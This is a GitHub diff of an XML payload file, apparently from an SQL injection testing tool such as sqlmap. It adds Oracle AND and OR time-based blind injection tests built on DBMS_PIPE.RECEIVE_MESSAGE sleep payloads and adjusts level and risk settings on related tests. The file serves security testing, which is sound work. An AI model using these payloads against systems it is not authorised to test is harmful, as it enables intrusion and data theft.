File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -1420,10 +1420,28 @@ Formats:
14201420 </details >
14211421 </test >
14221422
1423+ <test >
1424+ <title >Oracle AND time-based blind</title >
1425+ <stype >5</stype >
1426+ <level >1</level >
1427+ <risk >2</risk >
1428+ <clause >1,2,3</clause >
1429+ <where >1</where >
1430+ <request >
1431+ <payload >AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload >
1432+ </request >
1433+ <response >
1434+ <time >[SLEEPTIME]</time >
1435+ </response >
1436+ <details >
1437+ <dbms >Oracle</dbms >
1438+ </details >
1439+ </test >
1440+
14231441 <test >
14241442 <title >Oracle AND time-based blind (heavy query)</title >
14251443 <stype >5</stype >
1426- <level >2 </level >
1444+ <level >3 </level >
14271445 <risk >1</risk >
14281446 <clause >1,2,3</clause >
14291447 <where >1</where >
@@ -1560,12 +1578,30 @@ Formats:
15601578 <dbms >MySQL</dbms >
15611579 </details >
15621580 </test >
1581+
1582+ <test >
1583+ <title >Oracle OR time-based blind</title >
1584+ <stype >5</stype >
1585+ <level >3</level >
1586+ <risk >3</risk >
1587+ <clause >1,2,3</clause >
1588+ <where >2</where >
1589+ <request >
1590+ <payload >OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload >
1591+ </request >
1592+ <response >
1593+ <time >[SLEEPTIME]</time >
1594+ </response >
1595+ <details >
1596+ <dbms >Oracle</dbms >
1597+ </details >
1598+ </test >
15631599
15641600 <test >
15651601 <title >Oracle OR time-based blind (heavy query)</title >
15661602 <stype >5</stype >
15671603 <level >3</level >
1568- <risk >3 </risk >
1604+ <risk >4 </risk >
15691605 <clause >1,2,3</clause >
15701606 <where >2</where >
15711607 <request >
You can’t perform that action at this time.
0 commit comments